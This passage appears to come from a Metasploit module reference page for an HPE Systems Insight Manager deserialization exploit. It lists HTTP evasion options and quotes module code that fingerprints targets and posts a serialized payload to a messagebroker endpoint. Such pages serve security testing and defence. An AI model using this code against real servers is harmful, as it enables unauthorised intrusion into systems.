   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Failed to connect to the server.


Here is a relevant code snippet related to the "Failed to connect to the server." error message:

77:	  def check
78:	    res = send_request_cgi({
79:	      'method' => 'GET',
80:	      'uri' => normalize_uri(target_uri.path)
81:	    })
82:	    return CheckCode::Unknown('Failed to connect to the server.') if res.nil?
83:	
84:	    body = res.body
85:	    unless body.include?('Please insert your Smart Card and login to HPE System Insight Manager.') && body.include?('<title>HPE Systems Insight Manager</title>') && body.include?('/ui/javascript/XeHelp.js')
86:	      return CheckCode::Safe("Target doesn't appear to be a HPE System Insight Manager server!")
87:	    end

Target doesn't appear to be a HPE System Insight Manager server!


Here is a relevant code snippet related to the "Target doesn't appear to be a HPE System Insight Manager server!" error message:

81:	    })
82:	    return CheckCode::Unknown('Failed to connect to the server.') if res.nil?
83:	
84:	    body = res.body
85:	    unless body.include?('Please insert your Smart Card and login to HPE System Insight Manager.') && body.include?('<title>HPE Systems Insight Manager</title>') && body.include?('/ui/javascript/XeHelp.js')
86:	      return CheckCode::Safe("Target doesn't appear to be a HPE System Insight Manager server!")
87:	    end
88:	
89:	    data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)
90:	    f_handle = File.open(File.join(data_dir, 'emp.ser'), 'rb')
91:	    serialized_payload_content = f_handle.read

Non-200 HTTP response received during deserialization. Target doesn't seem to be vulnerable!


Here is a relevant code snippet related to the "Non-200 HTTP response received during deserialization. Target doesn't seem to be vulnerable!" error message:

97:	      'uri' => normalize_uri(target_uri.path, 'simsearch', 'messagebroker', 'amfsecure'),
98:	      'data' => serialized_payload_content_final
99:	    })
100:	
101:	    unless res&.code == 200
102:	      return CheckCode::Safe("Non-200 HTTP response received during deserialization. Target doesn't seem to be vulnerable!")
103:	    end
104:	    unless res.to_s.include?('java.lang.NullPointerException')
105:	      return CheckCode::Safe("200 OK response didn't contain expected java.lang.NullPointerException. Target is not vulnerable!")
106:	    end
107:	

200 OK response didn't contain expected java.lang.NullPointerException. Target is not vulnerable!


Here is a relevant code snippet related to the "200 OK response didn't contain expected java.lang.NullPointerException. Target is not vulnerable!" error message:

100:	
101:	    unless res&.code == 200
102:	      return CheckCode::Safe("Non-200 HTTP response received during deserialization. Target doesn't seem to be vulnerable!")
103:	    end
104:	    unless res.to_s.include?('java.lang.NullPointerException')
105:	      return CheckCode::Safe("200 OK response didn't contain expected java.lang.NullPointerException. Target is not vulnerable!")
106:	    end
107:	
108:	    CheckCode::Vulnerable('Target returned java.lang.NullPointerException in its 200 OK response!')
109:	  end
110:	

Target returned java.lang.NullPointerException in its 200 OK response!


Here is a relevant code snippet related to the "Target returned java.lang.NullPointerException in its 200 OK response!" error message:

103:	    end
104:	    unless res.to_s.include?('java.lang.NullPointerException')
105:	      return CheckCode::Safe("200 OK response didn't contain expected java.lang.NullPointerException. Target is not vulnerable!")
106:	    end
107:	
108:	    CheckCode::Vulnerable('Target returned java.lang.NullPointerException in its 200 OK response!')
109:	  end
110:	
111:	  def exploit
112:	    case target['Type']
113:	    when :windows_command

Non-200 HTTP response received while trying to execute the command


Here is a relevant code snippet related to the "Non-200 HTTP response received while trying to execute the command" error message:

156:	      'uri' => normalize_uri(target_uri.path, 'simsearch', 'messagebroker', 'amfsecure'),
157:	      'data' => serialized_payload_content_final
158:	    })
159:	
160:	    unless res&.code == 200
161:	      fail_with(Failure::UnexpectedReply, 'Non-200 HTTP response received while trying to execute the command')
162:	    end
163:	    unless res.to_s.include?('java.lang.NullPointerException')
164:	      fail_with(Failure::UnexpectedReply, 'Server should respond with a java.lang.NullPointerException upon successful deserialization, but no such message was received!')
165:	    end
166:	  end

Server should respond with a java.lang.NullPointerException upon successful deserialization, but no such message was received!


Here is a relevant code snippet related to the "Server should respond with a java.lang.NullPointerException upon successful deserialization, but no such message was received!" error message:

157:	      'data' => serialized_payload_content_final
158:	    })
159:	
160:	    unless res&.code == 200
161:	      fail_with(Failure::UnexpectedReply, 'Non-200 HTTP response received while trying to execute the command')
162:	    end
163:	    unless res.to_s.include?('java.lang.NullPointerException')
164:	      fail_with(Failure::UnexpectedReply, 'Server should respond with a java.lang.NullPointerException upon successful deserialization, but no such message was received!')
165:	    end
166:	  end
167:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Harrison Neal
  • Jang
  • Grant Willcox

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.